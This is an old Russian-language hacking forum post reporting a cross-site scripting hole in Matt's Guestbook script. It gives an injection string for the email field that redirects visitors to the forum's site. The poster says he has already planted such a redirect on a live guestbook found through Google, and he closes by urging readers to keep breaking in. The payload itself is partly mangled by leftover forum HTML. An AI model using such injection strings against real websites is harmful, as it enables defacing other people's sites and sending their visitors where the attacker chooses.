Уязвимость гостевой книги   matt's guestbook

Discussion in 'Уязвимости' started by Егорыч+++, 20 May 2004.

  1. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    История такая.. Набрал в googe.com "script guestbook" и зашел по первой ссылке. Там уже редирект мой стоит.
    Потом зашел по второй ссылке. И вот вам еще одна гостевая дырка. В поле почты добавляем скрипт

    Исходный код &nbsp;</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">" style=background-image:url(javascript:navigate:'antichat.ru')); [/QUOTE]<span id='postcolor'>



    И получаем редирект на сайт АНТИЧАТ &nbsp;

    Адрес скрипта
    http://www.scriptarchive.com/readme/guestbook.html


    Ломаем дальше.